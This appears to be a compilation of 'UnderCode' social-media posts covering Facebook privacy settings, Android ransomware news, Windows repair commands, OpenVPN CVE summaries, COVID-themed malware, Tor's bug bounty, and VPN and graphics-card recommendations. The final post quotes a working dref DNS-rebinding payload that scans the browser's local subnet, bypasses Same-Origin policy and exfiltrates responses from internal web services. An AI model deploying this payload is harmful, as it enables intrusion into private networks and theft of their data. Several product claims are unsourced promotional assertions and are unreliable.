▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to find, delete and manage the sending of data from applications and sites to Facebook :
t.me/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) What is activity outside of Facebook?
Although Facebook collects a lot of information about users on its platform, these are not all sources. The sites and applications you visit can also share collected data from Facebook. When you enter the application or website using your Facebook account or the website has a hidden Facebook tracker, all your actions are sent to this social network.

>You bought shoes in the online store

> An online store shares your activity with your business tools.

> Facebook receives your activity outside of Facebook and stores it in your account. Activity is saved as “Visit to the site of clothes and shoes” and “Purchase”.

> You see Facebook ads with a 10% discount on the following shoes or clothes in the online store.

2 ) What is Facebook doing with your activity?
The question is what Facebook is doing with information regarding your activity outside the social network. Facebook claims there are five uses for this activity:

>Targeted ad serving

>Offer groups, events, products that you may like

>Help finding companies and brands

>Helping organizations and enterprises understand how their sites, applications, and advertising reach the right people.

>Identify Suspicious Activity for Facebook Security

3) Search for activity outside of Facebook
There are a couple of ways to find an activity page outside of Facebook.

A) Via Facebook Settings
In an iOS app, click on the Facebook icon at the bottom of the navigation bar. If you have an older version of the application, click on the hamburger menu icon. On Android, click on the hamburger menu icon at the top in the navigation bar. In both cases, scroll down, click Settings and Privacy, then Settings. Scroll down again and select "Activity outside of Facebook."

B) Through privacy settings
You can click "Privacy Settings" in the "Settings and Privacy" section. Then scroll down and click on “View or clear activity outside of Facebook”.

4) View activity in individual applications and sites
On the “Activity outside of Facebook” page, you can click “Manage activity outside of Facebook” or on the set of profile icons at the top. Here you can see a list of all applications and sites from where Facebook receives information.

> Each source in the list shows the date when Facebook received the information, and the number of similar cases above the icon. The maximum value of 20+ can be any large.

> Click on a source to analyze activity. At the top you will again see the date of receipt of information,

Written by UnderCode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑HOW fix android Ransomware:
> network has appeared the source code of the ransomware SLocker Android, simulating WannaCry
instagram.com/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

>WannaCry malware interface , which infected hundreds of thousands of computers in countries around the world.

1) After infection, SLocker runs in the background of the victim without their knowledge and consent, encrypting images, documents and videos on mobile devices.

2) Once SLocker encrypted the files on the device, the ransomware takes complete control of the phone. He is also able to obtain administrator rights and control the microphone and camera devices.

🦑 Smartphones that have been infected by malware
Here is a list of infected smartphones:

Galaxy Note 2
Galaxy Tab S2
LG G4
Galaxy S7
Xiaomi Mi 4i
Galaxy S4
Galaxy Note 4
ZTE x500
Galaxy Note 3
Galaxy Tab 2
Oppo n3
Galaxy Note 5
Vivo X6 plus
Nexus 5
Nexus 5X
Galaxy Note Edge
Asus zenfone 2
Galaxy A5
LenovoS90
OppoR7 plus
Xiaomi Redmi
Lenovo A850

🦑How to protect yourself?

> We recommend that you take basic precautions to protect yourself from these threats:

1) Never open email attachments from unknown senders.

2) Never click on links in SMS or MMS messages.

3) Even if the letter looks normal from some company ,.

4) Go to Settings → Security and disable "allow installation of applications from sources other than Google Play."

5) We do not recommend connecting to unknown Wi-Fi networks and turn off Wi-Fi when not in use.

Written by UnderCode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

FIX GAMING ERROR 0x0000013 WINDOWS 7-WIN8 fro microsoft :
Twitter.com/undercodeNews

Press Windows key + X
Click Command Prompt (Admin)

Type in at the prompt OR Copy and Paste these one at a time : (Hit enter after each)

Dism /Online /Cleanup-Image /CheckHealth

Dism /Online /Cleanup-Image /ScanHealth

Dism /Online /Cleanup-Image /RestoreHealth

Also run the System File Checker utility:

Press Windows key + X
Click Command Prompt (Admin)

At the Command Prompt, type: sfc/scannow

This will check for any integrity violations

Restart your system

@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 OpenVpn Vulnerabilities :
pinterest.com/undercode_Testing

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) CVE-2017-7508 - the ability to remotely shut down a server or client by sending a specially designed IPv6 packet. The problem manifests itself when the “–mssfix” option is enabled;

2) CVE-2017-7512 is a series of problems in the OpenSSL certificate parsing code caused by the leak of several bytes of memory during the processing of each connection attempt. Having generated a large number of requests, you can cause the exhaustion of all available memory for the server process and cause a crash or prepare the conditions for exploiting the vulnerability CVE-2017-7521;

3) CVE-2017-7520 - the possibility of remote crashes of client software or information leakage from the client at the stage prior to authentication (you can read 96 extra bytes of the stack, which may well contain a proxy password). The problem is caused by the ability to read from the memory area outside the buffer boundaries and is manifested in systems using the “-http-proxy" option together with authentication via ntlm2. Operation can be accomplished by modifying traffic during the MITM attack between the client and the proxy;

4) CVE-2017-7522 - the ability to cause a server crash using the “-x509-track" option when an authenticated client sends a certificate with a null character in the ASN.1 line. The problem is manifested in configurations compiled with the mbed TLS / PolarSSL library. An attack is unlikely since a certificate with a null character certified by a certification authority is required;
Function dereference of a null pointer
establish_http_proxy_passthru ()

Written by UnderCode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Well bad guys also fond corona virus as good way for hacking :
twitter.com/undercodeNews

1) The coronavirus epidemic has become a global pandemic, so many want to track its spread. Some organizations offer panels showing the distribution of COVID-19. Unfortunately, hackers were able to use these panels to spread viruses to computers.

2) Researchers Labs found that hackers use these cards to steal user information. Among other things, they steal names, passwords, credit card information and other data from the browser.

3) Attackers design coronavirus websites to force users to download the application. It supposedly shows the spread of coronavirus. In fact, the application generates a malicious binary file that is installed on users' computers.

4) These sites do show genuine coronavirus distribution maps, but the URL and information are different from the original source.

5) Currently, only Windows computers are in danger. Researchers suggest that versions of the malicious offer for other operating systems will soon appear.

6) New option AZORult sets up a secret administrator account for remote attacks.

Written by UnderCode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Tor launches bug bounty program
t.me/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Now, the Tor Project, with the support of the Open Technology Fund, has teamed up with HackerOne and finally announced the launch of an open program for everyone. It is proposed to search for bugs in the Tor browser and the Tor network daemon. We consider vulnerabilities that allow escalation of privileges, remote execution of arbitrary code, unauthorized access to user data, as well as information about attack methods that can be used to extract encrypted data from nodes and clients.

2) The Tor Project announced its intention to launch the bug bounty program at the end of December 2015 during a speech by the Tor project admins at the Haos Communication Congress (CCC), held in Hamburg, Germany.

3) Depending on the severity of the problem, Tor Project is ready to pay researchers between $ 100 and $ 4,000. So, highly dangerous bugs are estimated at 2000-4000 dollars, on vulnerabilities of medium danger you can earn 500-2000 dollars, and for detecting very minor problems you can get 100 or even be left without a cash prize, but get a t-shirt, stickers and a place in Hall of Fame Tor.

4) In addition, less serious problems will be rewarded with corporate T-shirts, stickers and mentions in the Tor Hall of Fame.

5) The project first announced plans to launch a bug bounty program after Tor accused the FBI, commissioned by researchers from Carnegie Mellon University, of at least $ 1 million to help them crack the Tor chain and reveal the IP addresses of users, but the FBI categorically denies the claim.

Written by UnderCode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑The best video cards of 2020-graphic-for gaming recommended by undercode
instagram.com/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Best entry-level graphics cards (no more than $ 100)
Radeon RX 550 vs GeForce GT 1030

2) The best mainstream video cards (no more than $ 200)
Radeon RX 580 vs RX 570 vs RX 5500 XT vs GeForce GTX 1650 Super

3) Best mid-range graphics cards ($ 200 - $ 350)
GeForce GTX 1660 Super vs GeForce RTX 2060 vs Radeon RX 5600 XT

4) Best top-level graphics cards for 1440p ($ 400 +)
Radeon 5700 XT vs Radeon 5700 vs RTX 2070 Super vs RTX 2060 / Super

5) Best top-level graphics cards for 4K resolution (over $ 600)
GeForce RTX 2080 Ti vs GeForce RTX 2080 Super

Written by UnderCode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Best VPN Services for Windows & Why ?
instagram.com/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) ExpressVPN

> Very high speeds

>Works with Netflix & iPlayer

>Efficient and easy application for Windows

>Advanced privacy features like split tunneling

>Servers in 94 countries with secure connections
Minuses

2) NordVPN

>High speeds

>Work with popular services like Netflix

>Application with user-friendly interface and settings

>Connect up to 6 devices simultaneously
Extensive server list

>Even if NordVPN was located in the United States or Great Britain, no entries are kept here. No information regarding users is stored and not collected, so they cannot be tracked.

>Thanks to this provider, content on Netflix and BBC iPlayer services is available from any country, and in terms of speed, NordVPN is one of the three fastest. In terms of support, there is no need to complain. 24/7 live chat support with quick and helpful answers.

>NordVPN is superior to ExpressVPN in terms of price, which is lower here. This makes the service one of the best in terms of price and quality.

3) IPVanish

>High speed global connectivity

>Works with popular apps like Netflix

>Powerful Windows program with solid privacy settings

>Lack of logs
Connect to 50 countries

This service does not maintain logs, although many users can remember the story of how this provider handed information to the authorities.

The appearance of the application is not as attractive as that of ExpressVPN and NordVPN. Its dark green colors give the program a technological look, not too friendly for beginners.

4) CyberGhost

High speeds
Easy Netflix Access
Simple and effective Windows application
Complete lack of logs
Connecting to servers in 87 countries

Written by UnderCode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Why need vpn spacial windows ?
t.me/undercodeTesting

>The Microsoft Windows operating system is still the most popular on personal computers around the world. For this reason, it is a primary goal for hackers who want to steal users or gain access to personal information.


1) VPN will protect your computer and the data stored on it. There is a wide selection of VPN providers, some of which work better on Windows, others worse.

2) To make your choice easier, we’ll look at reviews of VPN providers on Windows and tell you which ones are the best.

3) If you are looking for a free VPN for your computer, there are some on Windows. You only need to understand that their work quality is not as high as that of the paid VPN services described in this article.

🦑What should a VPN on Windows have?

Windows app with user friendly interface
Reliable connection at high speeds
High level of security and privacy.
Clear logging policy with emphasis on confidentiality
Access popular streaming services
Access to torrents and P2P traffic

Written by UnderCode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Top 10 VPN Extensions for Google Chrome :
t.me/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Browsec VPN

> The main distinguishing feature of Browsec VPN is its connection speed. It offers speeds of up to 100 Mbps, which far exceeds the speed of many other VPN extensions in the Chrome store.

Browsec, on the other hand, is based in Russia. This is a country that does not differ in a tolerant attitude towards VPN. The service also offers only four locations - the Netherlands, Singapore, the USA and the UK.

In addition to the extension for Chrome, Browsec also offers VPN apps for Android and iOS

2)DotVPN
DotVPN is another powerful extension for Chrome. It offers the following features:

Unlimited bandwidth.
30 virtual locations.
Unlimited number of switches between locations.
DotVPN uses a 4096-bit encryption key — it is twice as good as the one specified in modern banking standards. It also instantly finds the least loaded server in your chosen virtual location, which significantly affects the increase in page loading speed.

3) ZenMate for Chrome
ZenMate for Chrome comes in two versions - the paid ZenMate Premium and the free ZenMate Free.

ZenMate Free will encrypt all your traffic and allows you to replace the virtual location. The free version offers 30 server locations - the USA, several European countries, Brazil, Singapore and others.

Users with the free version will also have access to the “Smart Price” function. It displays offers with the best prices for the products you are interested in.

In addition to the extension, ZenMate offers full-featured applications for Windows, macOS, Android, and iOS.

4) Betternet Chrome
Betternet Chrome does not maintain logs and - unlike many free VPN extensions for Chrome - does not display ads. But don’t worry, Betternet makes money by watching videos.

Read also: How to get rid of SMS Trojans WinLock (Windows Blocker)
Betternet Chrome is a great solution for users with little VPN experience. The extension for Chrome has a very simple interface with an on / off button.

5) Hola VPN

Hola VPN for Chrome has a very controversial reputation, and for a reason. This extension was caught using the VPN connections of its client in the botnet.

Today the situation is not much better. This VPN plugin does not have encryption; it uses proxy tunneling and is thus a regular proxy extension for Chrome. It also records all your information and is based in Israel. And Israel is a well-known collaborator of the 5 Eyes, 9 Eyes, and 14 Eyes alliances.

So why then use it? For the sake of speed. Independent research placed him among the 20 fastest VPNs, both among free and paid.

6) Hotspot Shield Chrome
Hotspot Shield Chrome is another free VPN extension for Chrome. Like DotVPN, it offers unlimited bandwidth.

After a recent update, several new features were added. Now you can block ads, set prohibitions on tracking and collecting cookies and enable malware protection. Its servers are located in 70 countries.

7) TunnelBear VPN

The TunnelBear VPN extension for Google Chrome offers users an encrypted proxy (remember that it is not encrypted in Hola).

It is worth remembering that the free TunnelBear VPN will only encrypt traffic in the browser. In order to encrypt traffic in all applications, you need to buy a paid version.

8) Gom VPN
Gom's free VPN extension provides access to geo-blocked content. The application offers one-click activation and an easy to configure user interface.

The VPN connection provided by this extension is safe - all your traffic will be encrypted using the HTTP2 SSL protocol, and it does not log.

9) SetupVPN

SetupVPN is another noteworthy extension for Chrome. You get unlimited bandwidth and a large list of servers (more than 100 servers are available worldwide).

SetupVPN for Chrome will encrypt all your traffic in the browser, for this a 4096-bit key is used.

10) Windscribe
Windscribe has gained a reputation as a fast, secure, and reliable paid VPN provider.

The Windscribe extension for Chrome blocks ads and tracking, and allows you to access blocked content. It also offers several features that take care of connection security - WebRTC blocking, API masking, time zone masking, and notification blocking.

Free VPN servers are located in more than 30 countries.
Written by UnderCode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Attacking headless browser :

dref does the heavy-lifting for DNS rebinding. The following snippet from one of its built-in payloads shows the framework being used to scan a local subnet from a hooked browser; after identifying live web services it proceeds to exfiltrate GET responses, breezing through the Same-Origin policy:
instagram.com/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

>the git https://github.com/FSecureLABS/dref

// mainFrame() runs first
async function mainFrame () {
// We use some tricks to derive the browser's local /24 subnet
const localSubnet = await network.getLocalSubnet(24)

// We use some more tricks to scan a couple of ports across the subnet
netmap.tcpScan(localSubnet, [80, 8080]).then(results => {
// We launch the rebind attack on live targets
for (let h of results.hosts) {
for (let p of h.ports) {
if (p.open) session.createRebindFrame(h.host, p.port)
}
}
})
}

// rebindFrame() will have target ip:port as origin
function rebindFrame () {
// After this we'll have bypassed the Same-Origin policy
session.triggerRebind().then(() => {
// We can now read the response across origin...
network.get(session.baseURL, {
successCb: (code, headers, body) => {
// ... and exfiltrate it
session.log({code: code, headers: headers, body: body})
}
})
})
}

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁